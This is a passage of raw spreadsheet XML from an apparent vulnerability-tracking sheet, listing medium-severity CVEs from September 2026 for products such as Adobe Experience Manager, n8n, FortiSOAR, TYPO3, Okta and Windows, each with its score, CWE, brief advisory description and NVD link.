s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1443" s="5" t="inlineStr" /><c r="R1443" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1443"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3" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75738</t></is></c></row><row r="1444"><c r="A1444" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1444" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1444" s="5" t="inlineStr"><is><t>CVE-2026-75739</t></is></c><c r="D1444" s="5" t="n"><v>5.4</v></c><c r="E1444" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1444" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1444" s="5" t="inlineStr" /><c r="H1444" s="5" t="n"><v>0.003</v></c><c r="I1444" s="5" t="inlineStr" /><c r="J1444" s="5" t="inlineStr" /><c r="K1444" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1444" s="5" t="inlineStr" /><c r="M1444" s="5" t="inlineStr" /><c r="N1444" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1444" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1444" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1444" s="5" t="inlineStr" /><c r="R1444" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1444"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4" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75739</t></is></c></row><row r="1445"><c r="A1445" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1445" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1445" s="5" t="inlineStr"><is><t>CVE-2026-75740</t></is></c><c r="D1445" s="5" t="n"><v>5.4</v></c><c r="E1445" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1445" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1445" s="5" t="inlineStr" /><c r="H1445" s="5" t="n"><v>0.003</v></c><c r="I1445" s="5" t="inlineStr" /><c r="J1445" s="5" t="inlineStr" /><c r="K1445" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1445" s="5" t="inlineStr" /><c r="M1445" s="5" t="inlineStr" /><c r="N1445" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1445" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1445" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1445" s="5" t="inlineStr" /><c r="R1445" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S1445"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5" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75740</t></is></c></row><row r="1446"><c r="A1446" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1446" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1446" s="5" t="inlineStr"><is><t>CVE-2026-75741</t></is></c><c r="D1446" s="5" t="n"><v>5.4</v></c><c r="E1446" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1446" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1446" s="5" t="inlineStr" /><c r="H1446" s="5" t="n"><v>0.003</v></c><c r="I1446" s="5" t="inlineStr" /><c r="J1446" s="5" t="inlineStr" /><c r="K1446" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1446" s="5" t="inlineStr" /><c r="M1446" s="5" t="inlineStr" /><c r="N1446" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1446" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1446" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1446" s="5" t="inlineStr" /><c r="R1446" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S144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6" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75741</t></is></c></row><row r="1447"><c r="A1447" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1447" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1447" s="5" t="inlineStr"><is><t>CVE-2026-75742</t></is></c><c r="D1447" s="5" t="n"><v>5.4</v></c><c r="E1447" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1447" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1447" s="5" t="inlineStr" /><c r="H1447" s="5" t="n"><v>0.003</v></c><c r="I1447" s="5" t="inlineStr" /><c r="J1447" s="5" t="inlineStr" /><c r="K1447" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1447" s="5" t="inlineStr" /><c r="M1447" s="5" t="inlineStr" /><c r="N1447" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1447" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1447" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1447" s="5" t="inlineStr" /><c r="R1447" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S144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7" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-75742</t></is></c></row><row r="1448"><c r="A1448" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1448" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1448" s="5" t="inlineStr"><is><t>CVE-2026-79905</t></is></c><c r="D1448" s="5" t="n"><v>5.4</v></c><c r="E1448" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1448" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1448" s="5" t="inlineStr" /><c r="H1448" s="5" t="n"><v>0.003</v></c><c r="I1448" s="5" t="inlineStr" /><c r="J1448" s="5" t="inlineStr" /><c r="K1448" s="5" t="inlineStr"><is><t>adobe:experience_manager</t></is></c><c r="L1448" s="5" t="inlineStr" /><c r="M1448" s="5" t="inlineStr" /><c r="N1448" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1448" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1448" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1448" s="5" t="inlineStr" /><c r="R1448" s="5" t="inlineStr"><is><t>CWE-79</t></is></c><c r="S144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8" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79905</t></is></c></row><row r="1449"><c r="A1449" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1449" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1449" s="5" t="inlineStr"><is><t>CVE-2026-84385</t></is></c><c r="D1449" s="5" t="n"><v>5.4</v></c><c r="E1449" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1449" s="5" t="inlineStr"><is><t>psirt@fortinet.com</t></is></c><c r="G1449" s="5" t="inlineStr" /><c r="H1449" s="5" t="n"><v>0.001</v></c><c r="I1449" s="5" t="inlineStr" /><c r="J1449" s="5" t="inlineStr"><is><t>fortinet</t></is></c><c r="K1449" s="5" t="inlineStr" /><c r="L1449" s="5" t="inlineStr" /><c r="M1449" s="5" t="inlineStr" /><c r="N1449" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1449" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1449" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1449" s="5" t="inlineStr" /><c r="R1449" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S1449" s="5" t="inlineStr"><is><t>A improper access control vulnerability in Fortinet FortiSOAR PaaS 7.6.0 through 7.6.6, FortiSOAR PaaS 7.5.0 through 7.5.3, FortiSOAR PaaS 7.4 all versions, FortiSOAR PaaS 7.3 all versions, FortiSOAR on-premise 7.6.0 through 7.6.6, FortiSOAR on-premise 7.5.0 through 7.5.3, FortiSOAR on-premise 7.4 all versions, FortiSOAR on-premise 7.3 all versions may allow attacker to escalation of privilege via &lt;insert attack vector here&gt;</t></is></c><c r="T1449" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84385</t></is></c></row><row r="1450"><c r="A1450" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1450" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1450" s="5" t="inlineStr"><is><t>CVE-2026-86996</t></is></c><c r="D1450" s="5" t="n"><v>5.4</v></c><c r="E1450" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1450" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1450" s="5" t="inlineStr" /><c r="H1450" s="5" t="n"><v>0.002</v></c><c r="I1450" s="5" t="inlineStr" /><c r="J1450" s="5" t="inlineStr" /><c r="K1450" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1450" s="5" t="inlineStr"><is><t>npm:n8n</t></is></c><c r="M1450" s="5" t="inlineStr"><is><t>2.37.7, 2.38.2</t></is></c><c r="N1450" s="5" t="inlineStr"><is><t>GHSA, NVD, OSV</t></is></c><c r="O1450" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1450" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1450" s="5" t="inlineStr" /><c r="R1450" s="5" t="inlineStr"><is><t>CWE-862</t></is></c><c r="S1450" s="5" t="inlineStr"><is><t>n8n is an open source workflow automation platform. Prior to 2.37.7 and 2.38.2, the workflow setting named This workflow can be called by was enforced by the Execute Workflow node but not when a workflow was attached to an Agent as a tool. A user able to build an Agent could invoke a restricted workflow and read its returned data. The affected path is packages/cli/src/modules/agents/tools/workflow-tool-factory.ts, where executeWorkflow omitted SubworkflowPolicyChecker.checkForProject. This issue is fixed in versions 2.37.7 and 2.38.2.</t></is></c><c r="T1450" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86996</t></is></c></row><row r="1451"><c r="A1451" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1451" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1451" s="5" t="inlineStr"><is><t>CVE-2026-12962</t></is></c><c r="D1451" s="5" t="n"><v>5.3</v></c><c r="E1451" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1451" s="5" t="inlineStr"><is><t>54bf65a7-a193-42d2-b1ba-8e150d3c35e1</t></is></c><c r="G1451" s="5" t="inlineStr" /><c r="H1451" s="5" t="n"><v>0.004</v></c><c r="I1451" s="5" t="inlineStr" /><c r="J1451" s="5" t="inlineStr" /><c r="K1451" s="5" t="inlineStr" /><c r="L1451" s="5" t="inlineStr" /><c r="M1451" s="5" t="inlineStr" /><c r="N1451" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1451" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1451" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1451" s="5" t="inlineStr" /><c r="R1451" s="5" t="inlineStr"><is><t>CWE-942</t></is></c><c r="S1451" s="5" t="inlineStr"><is><t>A Permissive Cross-domain Security Policy with Untrusted Domains in Armoury Crate allows a remote user to obtain a local user's NTLM hash by convincing the user to visit a crafted web page that sends a request containing a UNC path to the application's local service endpoint.Refer to the '
Security Update for Armoury Crate App ' section on the ASUS Security Advisory for more information.</t></is></c><c r="T1451" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-12962</t></is></c></row><row r="1452"><c r="A1452" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1452" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1452" s="5" t="inlineStr"><is><t>CVE-2026-19614</t></is></c><c r="D1452" s="5" t="n"><v>5.3</v></c><c r="E1452" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1452" s="5" t="inlineStr"><is><t>64c5ae8f-7972-4697-86a0-7ada793ac795</t></is></c><c r="G1452" s="5" t="inlineStr" /><c r="H1452" s="5" t="n"><v>0.002</v></c><c r="I1452" s="5" t="inlineStr" /><c r="J1452" s="5" t="inlineStr" /><c r="K1452" s="5" t="inlineStr" /><c r="L1452" s="5" t="inlineStr" /><c r="M1452" s="5" t="inlineStr" /><c r="N1452" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1452" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1452" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1452" s="5" t="inlineStr" /><c r="R1452" s="5" t="inlineStr"><is><t>CWE-611</t></is></c><c r="S1452" s="5" t="inlineStr"><is><t>The API is prone to XML external entity (XXE) injection. By default, XML external entity support is enabled.
This issue affects NanoXML: 2.2.3.</t></is></c><c r="T1452" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19614</t></is></c></row><row r="1453"><c r="A1453" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1453" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1453" s="5" t="inlineStr"><is><t>CVE-2026-19625</t></is></c><c r="D1453" s="5" t="n"><v>5.3</v></c><c r="E1453" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1453" s="5" t="inlineStr"><is><t>psirt@us.ibm.com</t></is></c><c r="G1453" s="5" t="inlineStr" /><c r="H1453" s="5" t="n"><v>0.003</v></c><c r="I1453" s="5" t="inlineStr" /><c r="J1453" s="5" t="inlineStr" /><c r="K1453" s="5" t="inlineStr" /><c r="L1453" s="5" t="inlineStr" /><c r="M1453" s="5" t="inlineStr" /><c r="N1453" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1453" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1453" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1453" s="5" t="inlineStr" /><c r="R1453" s="5" t="inlineStr"><is><t>CWE-284</t></is></c><c r="S1453" s="5" t="inlineStr"><is><t>When a Quarkus application has multiple endpoints secured by individual OIDC provider tenants, such as "/oidc-provider1" that is secured by the OIDC Provider 1 and "/oidc-provider2" that is secured by the OIDC Provider 2, and an optional token introspection cache is also enabled, then a valid token issued by the OIDC Provider 1 that can be used to access "/oidc-provider1" can also be used to access "/oidc-provider2" that is secured by another OIDC Provider 2.</t></is></c><c r="T1453" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-19625</t></is></c></row><row r="1454"><c r="A1454" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1454" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1454" s="5" t="inlineStr"><is><t>CVE-2026-33389</t></is></c><c r="D1454" s="5" t="n"><v>5.3</v></c><c r="E1454" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1454" s="5" t="inlineStr"><is><t>prodsec@nozominetworks.com</t></is></c><c r="G1454" s="5" t="inlineStr" /><c r="H1454" s="5" t="n"><v>0.001</v></c><c r="I1454" s="5" t="inlineStr" /><c r="J1454" s="5" t="inlineStr" /><c r="K1454" s="5" t="inlineStr" /><c r="L1454" s="5" t="inlineStr" /><c r="M1454" s="5" t="inlineStr" /><c r="N1454" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1454" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1454" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1454" s="5" t="inlineStr" /><c r="R1454" s="5" t="inlineStr"><is><t>CWE-671</t></is></c><c r="S1454" s="5" t="inlineStr"><is><t>An improper certificate/host key validation vulnerability was discovered in the Smart Polling functionality, which established encrypted connections to target devices without validating the remote host's identity, and no option was provided to enable it. A man-in-the-middle attacker positioned between a sensor and a polled device can, during a polling session, impersonate the device and intercept the communication, including the credentials used to access it. The captured credentials can then be replayed to authenticate against the device itself or against other devices sharing the same credentials, allowing the attacker to access and tamper with the device's data and to disrupt its operations.</t></is></c><c r="T1454" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-33389</t></is></c></row><row r="1455"><c r="A1455" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1455" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1455" s="5" t="inlineStr"><is><t>CVE-2026-33391</t></is></c><c r="D1455" s="5" t="n"><v>5.3</v></c><c r="E1455" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1455" s="5" t="inlineStr"><is><t>prodsec@nozominetworks.com</t></is></c><c r="G1455" s="5" t="inlineStr" /><c r="H1455" s="5" t="n"><v>0.003</v></c><c r="I1455" s="5" t="inlineStr" /><c r="J1455" s="5" t="inlineStr" /><c r="K1455" s="5" t="inlineStr" /><c r="L1455" s="5" t="inlineStr" /><c r="M1455" s="5" t="inlineStr" /><c r="N1455" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1455" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1455" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1455" s="5" t="inlineStr" /><c r="R1455" s="5" t="inlineStr"><is><t>CWE-863</t></is></c><c r="S1455" s="5" t="inlineStr"><is><t>An access control vulnerability was discovered in the Smart Polling configuration functionality due to insufficient validation of user privileges. An authenticated user with limited privileges can remotely bypass the intended access control of the web management interface and modify the Smart Polling discovery configuration. This allows the attacker to disrupt the visibility of assets in the monitored network.</t></is></c><c r="T1455" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-33391</t></is></c></row><row r="1456"><c r="A1456" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1456" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1456" s="5" t="inlineStr"><is><t>CVE-2026-47680</t></is></c><c r="D1456" s="5" t="n"><v>5.3</v></c><c r="E1456" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1456" s="5" t="inlineStr"><is><t>security-advisories@github.com</t></is></c><c r="G1456" s="5" t="inlineStr" /><c r="H1456" s="5" t="n"><v>0.003</v></c><c r="I1456" s="5" t="inlineStr" /><c r="J1456" s="5" t="inlineStr"><is><t>kubernetes</t></is></c><c r="K1456" s="5" t="inlineStr" /><c r="L1456" s="5" t="inlineStr" /><c r="M1456" s="5" t="inlineStr" /><c r="N1456" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1456" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1456" s="5" t="inlineStr"><is><t>2026-09-09</t></is></c><c r="Q1456" s="5" t="inlineStr" /><c r="R1456" s="5" t="inlineStr"><is><t>CWE-23</t></is></c><c r="S1456" s="5" t="inlineStr"><is><t>The source-controller is a Kubernetes operator, specialised in artifacts acquisition from external sources such as Git, OCI, Helm repositories and S3-compatible buckets. In versions 0.0.17 through 1.8.4, an actor with the ability to influence the contents of a bucket referenced by a `Bucket` resource can cause source-controller to write fetched object data to paths outside the per-reconciliation working directory. The corruption surface is bounded by source-controller's own and downstream Flux controllers' digest verification: source-controller verifies stored artifact digests during reconciliation and rebuilds on divergence; consumers (kustomize-controller, helm-controller) verify the digest of fetched artifacts and reject mismatches. These checks prevent a manipulated artifact from reaching the cluster, but an attacker can still write files anywhere the source-controller pod has permission to write. Separately, a user with permission to create or update `GitRepository` resources can cause source-controller to test for the existence of paths outside the cloned repository. Because the result is exposed via the resource's status, this allows limited enumeration of file paths on the controller pod. This surface exists only on source-controller v1.6.0 and later, where the sparse-checkout feature was introduced. This vulnerability was fixed in source-controller v1.8.5. There is no in-product workaround. Users should upgrade to a patched version. As a defense-in-depth measure for the GitRepository sparse-checkout surface, a `ValidatingAdmissionPolicy` (or a third-party policy engine such as Kyverno or OPA Gatekeeper) can be deployed to reject `GitRepository` resources whose `.spec.sparseCheckout` entries contain `..` or absolute path segments.</t></is></c><c r="T1456" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-47680</t></is></c></row><row r="1457"><c r="A1457" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1457" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1457" s="5" t="inlineStr"><is><t>CVE-2026-70575</t></is></c><c r="D1457" s="5" t="n"><v>5.3</v></c><c r="E1457" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1457" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1457" s="5" t="inlineStr" /><c r="H1457" s="5" t="n"><v>0.008</v></c><c r="I1457" s="5" t="inlineStr" /><c r="J1457" s="5" t="inlineStr" /><c r="K1457" s="5" t="inlineStr" /><c r="L1457" s="5" t="inlineStr" /><c r="M1457" s="5" t="inlineStr" /><c r="N1457" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1457" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1457" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1457" s="5" t="inlineStr" /><c r="R1457" s="5" t="inlineStr"><is><t>CWE-476</t></is></c><c r="S1457" s="5" t="inlineStr"><is><t>Null pointer dereference in Windows Schannel allows an authorized attacker to deny service over a network.</t></is></c><c r="T1457" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-70575</t></is></c></row><row r="1458"><c r="A1458" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1458" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1458" s="5" t="inlineStr"><is><t>CVE-2026-77132</t></is></c><c r="D1458" s="5" t="n"><v>5.3</v></c><c r="E1458" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1458" s="5" t="inlineStr"><is><t>f4fb688c-4412-4426-b4b8-421ecf27b14a</t></is></c><c r="G1458" s="5" t="inlineStr" /><c r="H1458" s="5" t="n"><v>0.004</v></c><c r="I1458" s="5" t="inlineStr" /><c r="J1458" s="5" t="inlineStr" /><c r="K1458" s="5" t="inlineStr" /><c r="L1458" s="5" t="inlineStr" /><c r="M1458" s="5" t="inlineStr" /><c r="N1458" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1458" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1458" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1458" s="5" t="inlineStr" /><c r="R1458" s="5" t="inlineStr"><is><t>CWE-200, CWE-862</t></is></c><c r="S1458" s="5" t="inlineStr"><is><t>It has been discovered that several AJAX routes used for the backend localization wizard failed to perform authorization checks. This allowed authenticated, low-privileged backend users to access information about records and content elements that fall outside of their permitted range. Exploiting this vulnerability requires a low-privileged backend user account. This issue affects TYPO3 CMS versions 10.0.0-10.4.59, 11.0.0-11.5.53, 12.0.0-12.4.48, 13.0.0-13.4.34 and 14.0.0-14.3.6.</t></is></c><c r="T1458" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-77132</t></is></c></row><row r="1459"><c r="A1459" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1459" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1459" s="5" t="inlineStr"><is><t>CVE-2026-78446</t></is></c><c r="D1459" s="5" t="n"><v>5.3</v></c><c r="E1459" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1459" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1459" s="5" t="inlineStr" /><c r="H1459" s="5" t="n"><v>0.006</v></c><c r="I1459" s="5" t="inlineStr" /><c r="J1459" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K145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59" s="5" t="inlineStr" /><c r="M1459" s="5" t="inlineStr" /><c r="N1459" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1459" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1459" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1459" s="5" t="inlineStr" /><c r="R1459" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1459" s="5" t="inlineStr"><is><t>Use after free in Windows Distributed File System (DFS) allows an authorized attacker to deny service over a network.</t></is></c><c r="T1459" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78446</t></is></c></row><row r="1460"><c r="A1460" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1460" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1460" s="5" t="inlineStr"><is><t>CVE-2026-78631</t></is></c><c r="D1460" s="5" t="n"><v>5.3</v></c><c r="E1460" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1460" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1460" s="5" t="inlineStr" /><c r="H1460" s="5" t="n"><v>0.001</v></c><c r="I1460" s="5" t="inlineStr" /><c r="J1460" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1460" s="5" t="inlineStr" /><c r="L1460" s="5" t="inlineStr" /><c r="M1460" s="5" t="inlineStr" /><c r="N1460" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1460" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1460" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1460" s="5" t="inlineStr" /><c r="R1460" s="5" t="inlineStr"><is><t>CWE-532</t></is></c><c r="S1460" s="5" t="inlineStr"><is><t>The Okta Hyperdrive Agent writes the decoded SAML bearer assertion to a local application log file at the default log level on every successful MFA completion. This insertion of sensitive information into the log file makes a live authentication credential readable by any local user with access to the log file.</t></is></c><c r="T1460" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78631</t></is></c></row><row r="1461"><c r="A1461" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1461" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1461" s="5" t="inlineStr"><is><t>CVE-2026-81380</t></is></c><c r="D1461" s="5" t="n"><v>5.3</v></c><c r="E1461" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1461" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1461" s="5" t="inlineStr" /><c r="H1461" s="5" t="n"><v>0.006</v></c><c r="I1461" s="5" t="inlineStr" /><c r="J1461" s="5" t="inlineStr" /><c r="K1461" s="5" t="inlineStr" /><c r="L1461" s="5" t="inlineStr" /><c r="M1461" s="5" t="inlineStr" /><c r="N1461" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1461" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1461" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="Q1461" s="5" t="inlineStr" /><c r="R1461" s="5" t="inlineStr"><is><t>CWE-77</t></is></c><c r="S1461" s="5" t="inlineStr"><is><t>Improper neutralization of special elements used in a command ('command injection') in GitHub Copilot and Visual Studio Code allows an unauthorized attacker to disclose information over a network.</t></is></c><c r="T1461" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81380</t></is></c></row><row r="1462"><c r="A1462" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1462" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1462" s="5" t="inlineStr"><is><t>CVE-2026-86080</t></is></c><c r="D1462" s="5" t="n"><v>5.3</v></c><c r="E1462" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1462" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1462" s="5" t="inlineStr" /><c r="H1462" s="5" t="n"><v>0.002</v></c><c r="I1462" s="5" t="inlineStr" /><c r="J1462" s="5" t="inlineStr" /><c r="K1462" s="5" t="inlineStr"><is><t>n8n:n8n</t></is></c><c r="L1462" s="5" t="inlineStr" /><c r="M1462" s="5" t="inlineStr" /><c r="N1462" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1462" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1462" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1462" s="5" t="inlineStr" /><c r="R1462" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="S1462" s="5" t="inlineStr"><is><t>n8n is an open source workflow automation platform. Prior to 1.123.76, 2.37.7, and 2.38.2, the GitHub Trigger generated a webhook secret but discarded it when GitHub returned HTTP 422 and the node reused an existing webhook. Workflow static data then retained webhookId without webhookSecret, and X-Hub-Signature-256 verification accepted deliveries without a stored secret. The affected logic includes packages/nodes-base/nodes/Github/GithubTriggerHelpers.ts and the 422 webhook reuse path. This issue is fixed in versions 1.123.76, 2.37.7 and 2.38.2.</t></is></c><c r="T1462" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-86080</t></is></c></row><row r="1463"><c r="A1463" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1463" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1463" s="5" t="inlineStr"><is><t>CVE-2026-86714</t></is></c><c r="D1463" s="5" t="n"><v>5.3</v></c><c r="E1463" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1463" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1463" s="5" t="inlineStr" /><c r="H1463" s="5" t="n"><v>0.002</v></c><c r="I1463" s="5" t="inlineStr" /><c r="J1463" s="5" t="inlineStr" /><c r="K1463" s="5" t="inlineStr" /><c r="L1463" s="5" t="inlineStr" /><c r="M1463" s="5" t="inlineStr" /><c r="N1463" s="5" 